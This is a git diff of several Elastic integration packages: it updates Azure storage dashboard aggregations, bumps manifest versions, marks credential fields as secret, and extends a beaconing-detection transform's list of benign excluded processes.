"savedVis": { "data": { "aggs": [], @@ -66,7 +67,7 @@ "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Blob](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [**Table**](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", "openLinksInNewTab": false }, - "title": "Navigation Table Storage Overview [Azure Metrics]", + "title": "Navigation Table Storage Overview", "type": "markdown", "uiState": {} } @@ -79,6 +80,7 @@ "y": 0 }, "panelIndex": "204cbabc-fafd-472c-b106-bd08f5262b1f", + "title": "Navigation Table Storage Overview", "type": "visualization", "version": "8.7.0" }, @@ -114,10 +116,10 @@ "4ec7ad4b-9db8-47c7-98d7-19400cb70922": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.table_capacity.avg))", + "label": "overall_max(last_value(azure.storage_account.table_capacity.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.table_capacity.avg))", + "formula": "overall_max(last_value(azure.storage_account.table_capacity.avg))", "isFormulaBroken": false }, "references": [ @@ -128,11 +130,15 @@ "4ec7ad4b-9db8-47c7-98d7-19400cb70922X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.table_capacity.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_capacity.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.table_capacity.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_capacity.avg" @@ -141,7 +147,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_capacity.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.table_capacity.avg))", "operationType": "overall_max", "references": [ "4ec7ad4b-9db8-47c7-98d7-19400cb70922X0" @@ -157,12 +163,12 @@ }, "isBucketed": false, "label": "Table Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_capacity.avg" @@ -196,7 +202,7 @@ "metricAccessor": "65b98bd8-f136-4716-9ec6-94443d4fac64" } }, - "title": "Storage Table Capacity [Azure Metrics] (converted)", + "title": "Storage Table Capacity", "type": "lens", "visualizationType": "lnsMetric" }, @@ -211,7 +217,7 @@ "y": 5 }, "panelIndex": "15b7c108-0214-4af6-9719-fab59affafec", - "title": "Storage Table Capacity [Azure Metrics]", + "title": "Storage Table Capacity", "type": "lens", "version": "8.7.0" }, @@ -253,12 +259,12 @@ }, "isBucketed": false, "label": "Table Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_count.avg" @@ -266,10 +272,10 @@ "c17ea056-b0cd-4821-a97c-8682579757c3": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.table_count.avg))", + "label": "overall_max(last_value(azure.storage_account.table_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.table_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.table_count.avg))", "isFormulaBroken": false }, "references": [ @@ -280,11 +286,15 @@ "c17ea056-b0cd-4821-a97c-8682579757c3X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.table_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.table_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_count.avg" @@ -293,7 +303,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.table_count.avg))", "operationType": "overall_max", "references": [ "c17ea056-b0cd-4821-a97c-8682579757c3X0" @@ -329,7 +339,7 @@ "metricAccessor": "2d62dcb1-64ad-46b4-9909-34975f4409ab" } }, - "title": "Storage Table Count [Azure Metrics] (converted)", + "title": "Storage Table Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -344,7 +354,7 @@ "y": 5 }, "panelIndex": "4177a6e6-97d7-447e-bcf3-ee9c1d660bd8", - "title": "Storage Table Count [Azure Metrics]", + "title": "Storage Table Count", "type": "lens", "version": "8.7.0" }, @@ -380,10 +390,10 @@ "303b0b16-adb3-4fa9-bd7c-67dc742d8f3e": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.table_entity_count.avg))", + "label": "overall_max(last_value(azure.storage_account.table_entity_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.table_entity_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.table_entity_count.avg))", "isFormulaBroken": false }, "references": [ @@ -394,11 +404,15 @@ "303b0b16-adb3-4fa9-bd7c-67dc742d8f3eX0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.table_entity_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_entity_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.table_entity_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_entity_count.avg" @@ -407,7 +421,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_entity_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.table_entity_count.avg))", "operationType": "overall_max", "references": [ "303b0b16-adb3-4fa9-bd7c-67dc742d8f3eX0" @@ -423,12 +437,12 @@ }, "isBucketed": false, "label": "Table Entity Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_entity_count.avg" @@ -462,7 +476,7 @@ "metricAccessor": "fa522977-cc94-4c29-b0fd-812045d19c42" } }, - "title": "Storage Table Entity Count [Azure Metrics] (converted)", + "title": "Storage Table Entity Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -477,7 +491,7 @@ "y": 5 }, "panelIndex": "28d85d90-3881-4d1f-b60c-43b545fc9f0e", - "title": "Storage Table Entity Count [Azure Metrics]", + "title": "Storage Table Entity Count", "type": "lens", "version": "8.7.0" }, @@ -516,7 +530,7 @@ "params": { "dropPartials": false, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -524,18 +538,22 @@ "2481e81f-e447-4eee-9c37-2ecd948035f2": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, "isBucketed": false, "label": "Availability", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " %" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.availability.avg" @@ -626,7 +644,7 @@ "yRightScale": "linear" } }, - "title": "Storage Availability [Azure Metrics] (converted)", + "title": "Storage Availability", "type": "lens", "visualizationType": "lnsXY" }, @@ -681,7 +699,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -811,7 +829,7 @@ "yRightScale": "linear" } }, - "title": "Storage Transactions [Azure Metrics] (converted)", + "title": "Storage Transactions", "type": "lens", "visualizationType": "lnsXY" }, @@ -892,7 +910,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -900,18 +918,22 @@ "727a5c36-c364-41c8-8b05-ae24da3122ec": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, "isBucketed": false, "label": "SuccessServerLatency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_server_latency.avg" @@ -1003,7 +1025,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success Server Latency [Azure Metrics] (converted)", + "title": "Storage Success Server Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1079,18 +1101,22 @@ "77a4e9f4-1a06-46b4-b1a6-7ca0d8802e12": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_e2elatency.avg: *" + }, "isBucketed": false, "label": "Success E2E Latency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_e2elatency.avg" @@ -1103,7 +1129,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1195,7 +1221,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success E2E Latency [Azure Metrics] (converted)", + "title": "Storage Success E2E Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1276,7 +1302,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1390,7 +1416,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Egress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Egress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1493,7 +1519,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1585,7 +1611,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Ingress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Ingress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1610,7 +1636,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.0", - "created_at": "2023-09-01T05:45:24.377Z", + "created_at": "2024-03-29T10:13:36.125Z", "id": "azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc", "migrationVersion": { "dashboard": "8.7.0" diff --git a/packages/azure_metrics/manifest.yml b/packages/azure_metrics/manifest.yml index 2ebbf6364b4..f9cda0d94f2 100644 --- a/packages/azure_metrics/manifest.yml +++ b/packages/azure_metrics/manifest.yml @@ -1,6 +1,6 @@ name: azure_metrics title: Azure Resource Metrics -version: 1.4.1 +version: 1.5.0 release: ga description: Collect metrics from Azure resources with Elastic Agent. type: integration diff --git a/packages/barracuda/changelog.yml b/packages/barracuda/changelog.yml index fef1ca672a3..85bb4c9035e 100644 --- a/packages/barracuda/changelog.yml +++ b/packages/barracuda/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.12.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9390 - version: "1.11.2" changes: - description: Changed owners diff --git a/packages/barracuda/manifest.yml b/packages/barracuda/manifest.yml index 3e5c422dac1..7f921d6dacb 100644 --- a/packages/barracuda/manifest.yml +++ b/packages/barracuda/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.1" +format_version: "3.0.3" name: barracuda title: "Barracuda Web Application Firewall" -version: "1.11.2" +version: "1.12.0" description: "Collect logs from Barracuda Web Application Firewall with Elastic Agent." type: integration source: diff --git a/packages/barracuda_cloudgen_firewall/changelog.yml b/packages/barracuda_cloudgen_firewall/changelog.yml index c1eea6d8cd2..8ea2464cbc3 100644 --- a/packages/barracuda_cloudgen_firewall/changelog.yml +++ b/packages/barracuda_cloudgen_firewall/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.11.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9390 - version: "1.10.1" changes: - description: Changed owners diff --git a/packages/barracuda_cloudgen_firewall/manifest.yml b/packages/barracuda_cloudgen_firewall/manifest.yml index 751ef008aac..9821b00bf6c 100644 --- a/packages/barracuda_cloudgen_firewall/manifest.yml +++ b/packages/barracuda_cloudgen_firewall/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: barracuda_cloudgen_firewall title: Barracuda CloudGen Firewall Logs -version: "1.10.1" +version: "1.11.0" description: Collect logs from Barracuda CloudGen Firewall devices with Elastic Agent. categories: ["network", "security", "firewall_security"] type: integration diff --git a/packages/beaconing/changelog.yml b/packages/beaconing/changelog.yml index 677e7215a03..144e749083a 100644 --- a/packages/beaconing/changelog.yml +++ b/packages/beaconing/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.2.0" + changes: + - description: Update transform exceptionlist + type: enhancement + link: https://github.com/elastic/integrations/pull/9332 - version: "1.1.0" changes: - description: Update package docs diff --git a/packages/beaconing/docs/README.md b/packages/beaconing/docs/README.md index e1682022908..2aa884b7528 100644 --- a/packages/beaconing/docs/README.md +++ b/packages/beaconing/docs/README.md @@ -48,8 +48,18 @@ The transform, which runs every hour, also filters out common, known application The values highlighted above are typical of beaconing behavior and can help with your investigation. +## Exceptionlist customizations + +There are two places where you can customize which processes are on an exceptionlist for this detection. The first is in the transforms: these contain processes which are common, and thus it is beneficial for the transform's performance and data processing to keep some processes here. You can read more on how to customize the transforms in the next section. + +We also provide a default exceptionlist in the rules, which you can [inspect and customize in the UI](https://www.elastic.co/guide/en/security/current/detections-ui-exceptions.html). The source can be viewed [here](https://github.com/elastic/detection-rules/tree/main/rules/integrations/beaconing). + ## Further customizations -Advanced users can also tune the scripted metric aggregation's parameters, such as jitter percentage or time window. To overwrite the default parameters: delete the transform, change the parameters, and restart the transform. The configurable parameters are: + +Advanced users can also tune the scripted metric aggregation's parameters, such as jitter percentage or time window. Navigate to Transforms on your Elastic cluster and find the transform installed by this package (search `beaconing`). You can browse the source of the transform there by clicking on the `.json` tab; the source code of the latest version can also be viewed [here](https://github.com/elastic/integrations/blob/main/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml#L364). + +To overwrite the default parameters: stop the transform installed by the package, clone the transform, change the parameters of the cloned transform, then start the cloned transform. The configurable parameters are: + * `number_buckets_in_range`: The number of time buckets into which the time window is split. Using more buckets improves estimates for various statistics, but also increases resource usage. * `time_bucket_length`: The length of each time bucket. A higher value indicates a longer time window. Set this to a higher value to check for very low-frequency beacons. * `number_destination_ips`: The number of destination IPs to collect in results. Setting this to a higher value increases resource usage. diff --git a/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml b/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml index 90cd9dd2d4a..cd6dce36da9 100644 --- a/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml +++ b/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml @@ -1,6 +1,6 @@ dest: - index: ml_beaconing-1.1.0 - pipeline: 1.1.0-ml_beaconing_ingest_pipeline + index: ml_beaconing-1.2.0 + pipeline: 1.2.0-ml_beaconing_ingest_pipeline aliases: - alias: ml_beaconing.latest move_on_creation: true @@ -361,7 +361,7 @@ source: minimum_should_match: 1 must_not: terms: - 'process.name': ["Acrobat.exe", "AcroCEF.exe", "AcroCEF Helper", "AddressBookSourceSync", "Adobe_CCXProcess.node", "Adobe CEF Helper", "Adobe CEF Helper.exe", "AdobeCollabSync.exe", "Adobe Desktop Service", "Adobe Desktop Service.exe", "accountsd", "akd", "appstoreagent", "apsd", "atmgr.exe", "assistantd", "backgroundTaskHost.exe", "BackgroundTransferHost.exe", "Brave Browser Helper", "CalendarAgent", "Camtasia 2020", "CCXProcess", "chrome.exe", "cloudd", "Code.exe", "Code Helper", "Code Helper (Renderer)", "CompatTelRunner.exe", "com.apple.geod", "com.apple.ncplugin.stocks", "com.apple.Safari.SafeBrowsing.Service", "com.apple.WebKit.Networking", "com.docker.vpnkit", "commerce", "Core Sync", "CoreSync.exe", "default-browser-agent.exe", "DeliveryService.exe", "DeviceCensus.exe", "Docker", "Dropbox", "Dsapi.exe", "elastic-agent", "elastic-agent.exe", "elastic-endpoint", "esensor", "EXCEL.EXE", "explorer.exe", "familycircled", "filebeat", "filebeat.exe", "FileCoAuth.exe", "firefox", "firefox.exe", "GitHub Desktop Helper", "Google Chrome Helper", "google_osconfig_agent", "google_osconfig_agent.exe", "google_guest_agent", "GCEWindowsAgent.exe", "Google Drive", "GoogleDriveFS.exe", "GoogleUpdate.exe", "IMRemoteURLConnectionAgent", "jamf", "keybase", "ksfetch", "Lenovo.Modern.ImController.PluginHost.CompanionApp.exe", "LenovoVantageService.exe", "locationd", "mapspushd", "mcautoreg.exe", "metricbeat", "mdmclient", "Mail", "MMSSHOST.exe", "Microsoft Excel", "Microsoft.Management.Services.IntuneWindowsAgent.exe", "Microsoft OneNote", "Microsoft PowerPoint", "Microsoft Teams Helper", "Microsoft Teams Helper (Renderer)", "Microsoft Update Assistant", "Microsoft Word", "ModuleCoreService.exe", "msedge.exe", "node", "node.exe", "nsurlsessiond", "OfficeC2RClient.exe", "ONENOTE.EXE", "officesvcmgr.exe", "OfficeClickToRun.exe", "OneDrive.exe", "parsec-fbf", "parsecd", "pingsender.exe", "SDXHelper.exe", "SearchApp.exe", "ServiceLayer.exe", "Skype for Business", "Slack.exe", "Slack Helper", "snapd", "smartscreen.exe", "softwareupdated", "Spotify.exe", "Spotify Helper", "ssm-agent-worker.exe", "ssm-document-worker.exe", "syspolicyd", "SystemIdleCheck.exe", "taskhostw.exe", "Teams", "Teams.exe", "trustd", "updater", "WINWORD.EXE", "WhatsApp Helper", "xpcproxy", "Zoom.exe", "zoom.us", "ZoomPresence"] + 'process.name': ["Acrobat.exe", "AcroCEF.exe", "AcroCEF Helper", "AddressBookSourceSync", "Adobe_CCXProcess.node", "Adobe CEF Helper", "Adobe CEF Helper.exe", "AdobeCollabSync.exe", "Adobe Desktop Service", "Adobe Desktop Service.exe", "accountsd", "akd", "appstoreagent", "apsd", "atmgr.exe", "assistantd", "backgroundTaskHost.exe", "BackgroundTransferHost.exe", "Brave Browser Helper", "CalendarAgent", "Camtasia 2020", "CCXProcess", "chrome.exe", "cloudd", "Code.exe", "Code Helper", "Code Helper (Renderer)", "CompatTelRunner.exe", "com.apple.geod", "com.apple.ncplugin.stocks", "com.apple.Safari.SafeBrowsing.Service", "com.apple.WebKit.Networking", "com.docker.vpnkit", "commerce", "Core Sync", "CoreSync.exe", "default-browser-agent.exe", "DeliveryService.exe", "DeviceCensus.exe", "Docker", "Dropbox", "Dsapi.exe", "elastic-agent", "elastic-agent.exe", "elastic-endpoint", "esensor", "EXCEL.EXE", "explorer.exe", "familycircled", "filebeat", "filebeat.exe", "FileCoAuth.exe", "firefox", "firefox.exe", "GitHub Desktop Helper", "Google Chrome Helper", "google_osconfig_agent", "google_osconfig_agent.exe", "google_guest_agent", "GCEWindowsAgent.exe", "Google Drive", "GoogleDriveFS.exe", "GoogleUpdate.exe", "IMRemoteURLConnectionAgent", "jamf", "keybase", "ksfetch", "Lenovo.Modern.ImController.PluginHost.CompanionApp.exe", "LenovoVantageService.exe", "locationd", "mapspushd", "mcautoreg.exe", "metricbeat", "mdmclient", "Mail", "MMSSHOST.exe", "Microsoft Excel", "Microsoft.Management.Services.IntuneWindowsAgent.exe", "Microsoft.SharePoint.exe", "Microsoft OneNote", "Microsoft PowerPoint", "Microsoft Teams Helper", "Microsoft Teams Helper (Renderer)", "Microsoft Update Assistant", "Microsoft Word", "ModuleCoreService.exe", "msedge.exe", "node", "node.exe", "nsurlsessiond", "OfficeC2RClient.exe", "ONENOTE.EXE", "officesvcmgr.exe", "OfficeClickToRun.exe", "OneDrive.exe", "parsec-fbf", "parsecd", "pingsender.exe", "SDXHelper.exe", "SearchApp.exe", "ServiceLayer.exe", "Skype for Business", "Slack.exe", "Slack Helper", "snapd", "smartscreen.exe", "softwareupdated", "Spotify.exe", "Spotify Helper", "ssm-agent-worker.exe", "ssm-document-worker.exe", "svchost.exe", "syspolicyd", "SystemIdleCheck.exe", "taskhostw.exe", "Teams", "Teams.exe", "trustd", "updater", "WINWORD.EXE", "WhatsApp Helper", "xpcproxy", "Zoom.exe", "zoom.us", "ZoomPresence"] should: - bool: filter: @@ -382,5 +382,5 @@ sync: delay: 120s field: "@timestamp" _meta: - fleet_transform_version: 1.1.0 + fleet_transform_version: 1.2.0 run_as_kibana_system: false diff --git a/packages/beaconing/manifest.yml b/packages/beaconing/manifest.yml index a8236c80dae..701c9615863 100644 --- a/packages/beaconing/manifest.yml +++ b/packages/beaconing/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.0.0 name: beaconing title: "Network Beaconing Identification" -version: 1.1.0 +version: 1.2.0 source: license: "Elastic-2.0" description: "Package to identify beaconing activity in your network events." diff --git a/packages/bitdefender/changelog.yml b/packages/bitdefender/changelog.yml index 76e2c210e27..c4114cdc822 100644 --- a/packages/bitdefender/changelog.yml +++ b/packages/bitdefender/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.12.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.11.0" changes: - description: Disable content-type checks diff --git a/packages/bitdefender/data_stream/push_notifications/manifest.yml b/packages/bitdefender/data_stream/push_notifications/manifest.yml index 9854c1424f3..a210bbbad63 100644 --- a/packages/bitdefender/data_stream/push_notifications/manifest.yml +++ b/packages/bitdefender/data_stream/push_notifications/manifest.yml @@ -30,12 +30,13 @@ streams: show_user: false default: /bitdefender/push/notification - name: authorization_value - type: text + type: password title: Authorization Value description: Authorization header value multi: false required: false show_user: true + secret: true - name: ssl type: yaml title: TLS diff --git a/packages/bitdefender/manifest.yml b/packages/bitdefender/manifest.yml index 84936cd981b..6813aca7fe0 100644 --- a/packages/bitdefender/manifest.yml +++ b/packages/bitdefender/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: bitdefender title: "BitDefender" -version: "1.11.0" +version: "1.12.0" source: license: "Elastic-2.0" description: "Ingest BitDefender GravityZone logs and data" @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: "^8.5.1" + version: "^8.12.0" elastic: subscription: "basic" screenshots: @@ -70,10 +70,11 @@ policy_templates: required: true default: https://cloud.gravityzone.bitdefender.com/api/v1.0/jsonrpc/push - name: api_key - type: text + type: password title: BitDefender GravityZone API Key show_user: true required: true + secret: true - name: enable_request_tracer type: bool title: Enable request tracing diff --git a/packages/bitwarden/changelog.yml b/packages/bitwarden/changelog.yml index ba24346df65..3e9c5f5240a 100644 --- a/packages/bitwarden/changelog.yml +++ b/packages/bitwarden/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.11.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.10.2" changes: - description: Changed owners diff --git a/packages/bitwarden/manifest.yml b/packages/bitwarden/manifest.yml index a1ede85805c..3c9caa7d7aa 100644 --- a/packages/bitwarden/manifest.yml +++ b/packages/bitwarden/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: bitwarden title: Bitwarden -version: "1.10.2" +version: "1.11.0" source: license: Elastic-2.0 description: Collect logs from Bitwarden with Elastic Agent. @@ -11,7 +11,7 @@ categories: - credential_management conditions: kibana: - version: "^8.4.1" + version: "^8.12.0" elastic: subscription: "basic" screenshots: @@ -67,6 +67,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: token_url type: text title: Token URL @@ -75,6 +76,7 @@ policy_templates: required: true show_user: false default: 'https://identity.bitwarden.com/connect/token' + secret: false - name: proxy_url type: text title: Proxy URL diff --git a/packages/bluecoat/_dev/deploy/docker/docker-compose.yml b/packages/bluecoat/_dev/deploy/docker/docker-compose.yml index 781a7ecec6a..c2437152547 100644 --- a/packages/bluecoat/_dev/deploy/docker/docker-compose.yml +++ b/packages/bluecoat/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" bluecoat-director-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9527 -p=udp /sample_logs/bluecoat-director-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9527 -p=udp /sample_logs/bluecoat-director-*.log bluecoat-director-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9527 -p=tcp /sample_logs/bluecoat-director-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9527 -p=tcp /sample_logs/bluecoat-director-*.log diff --git a/packages/box_events/changelog.yml b/packages/box_events/changelog.yml index e764a0504d1..381b0b953ad 100644 --- a/packages/box_events/changelog.yml +++ b/packages/box_events/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "2.8.0" + changes: + - description: Use `event_id` field for document fingerprinting. + type: enhancement + link: https://github.com/elastic/integrations/pull/9498 +- version: "2.7.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9389 +- version: "2.6.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "2.5.1" changes: - description: Changed owners diff --git a/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-locations.log-expected.json b/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-locations.log-expected.json index 1e01fec0525..06a324ea755 100644 --- a/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-locations.log-expected.json +++ b/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-locations.log-expected.json @@ -78,12 +78,12 @@ "indicator": { "description": "IP 81.2.69.144 was observed to Download file ABC/DEF/xyz.txt by Box Excel Online Previewer", "geo": { - "ip": "81.2.69.144", "location": { "lat": "37.5555", "lon": "-120.6789" } }, + "ip": "81.2.69.144", "provider": "Box Excel Online Previewer", "type": "ipv4-addr" } @@ -159,7 +159,6 @@ "indicator": { "description": "IP Unknown IP was observed to Download file ABC/DEF/xyz.txt by Box Excel Online Previewer", "geo": { - "ip": "Unknown IP", "location": { "lat": "37.5555", "lon": "-120.6789" diff --git a/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-sessions.log-expected.json b/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-sessions.log-expected.json index 3aaaba416e1..cfc438754b4 100644 --- a/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-sessions.log-expected.json +++ b/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-sessions.log-expected.json @@ -77,12 +77,12 @@ "indicator": { "description": "IP 81.2.69.142 was observed to Set shared link expiration file ABC/DEF/xyz.txt by ServiceName", "geo": { - "ip": "81.2.69.142", "location": { "lat": "37.5555", "lon": "-120.6789" } }, + "ip": "81.2.69.142", "provider": "ServiceName", "type": "user-account" } @@ -161,7 +161,6 @@ "indicator": { "description": "IP Unknown IP was observed to Set shared link expiration file ABC/DEF/xyz.txt by ServiceName", "geo": { - "ip": "Unknown IP", "location": { "lat": "37.5555", "lon": "-120.6789" diff --git a/packages/box_events/data_stream/events/_dev/test/system/test-httpjson-config.yml b/packages/box_events/data_stream/events/_dev/test/system/test-httpjson-config.yml index 0db0a69e22d..074f117a3e3 100644 --- a/packages/box_events/data_stream/events/_dev/test/system/test-httpjson-config.yml +++ b/packages/box_events/data_stream/events/_dev/test/system/test-httpjson-config.yml @@ -11,3 +11,5 @@ data_stream: vars: stream_type: 'all' enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/box_events/data_stream/events/agent/stream/httpjson.yml.hbs b/packages/box_events/data_stream/events/agent/stream/httpjson.yml.hbs index fac4f76365d..76d1684b005 100644 --- a/packages/box_events/data_stream/events/agent/stream/httpjson.yml.hbs +++ b/packages/box_events/data_stream/events/agent/stream/httpjson.yml.hbs @@ -37,4 +37,8 @@ tags: {{/if}} {{#each tags as |tag i|}} - {{tag}} -{{/each}} \ No newline at end of file +{{/each}} +fields_under_root: true +fields: + _conf: + client_id: {{client_id}} diff --git a/packages/box_events/data_stream/events/elasticsearch/ingest_pipeline/default.yml b/packages/box_events/data_stream/events/elasticsearch/ingest_pipeline/default.yml index 55d1ce8b368..7aad12061c0 100644 --- a/packages/box_events/data_stream/events/elasticsearch/ingest_pipeline/default.yml +++ b/packages/box_events/data_stream/events/elasticsearch/ingest_pipeline/default.yml @@ -12,6 +12,12 @@ processors: - json: field: event.original target_field: box + - fingerprint: + fields: + - box.event_id + - _conf.client_id + target_field: "_id" + 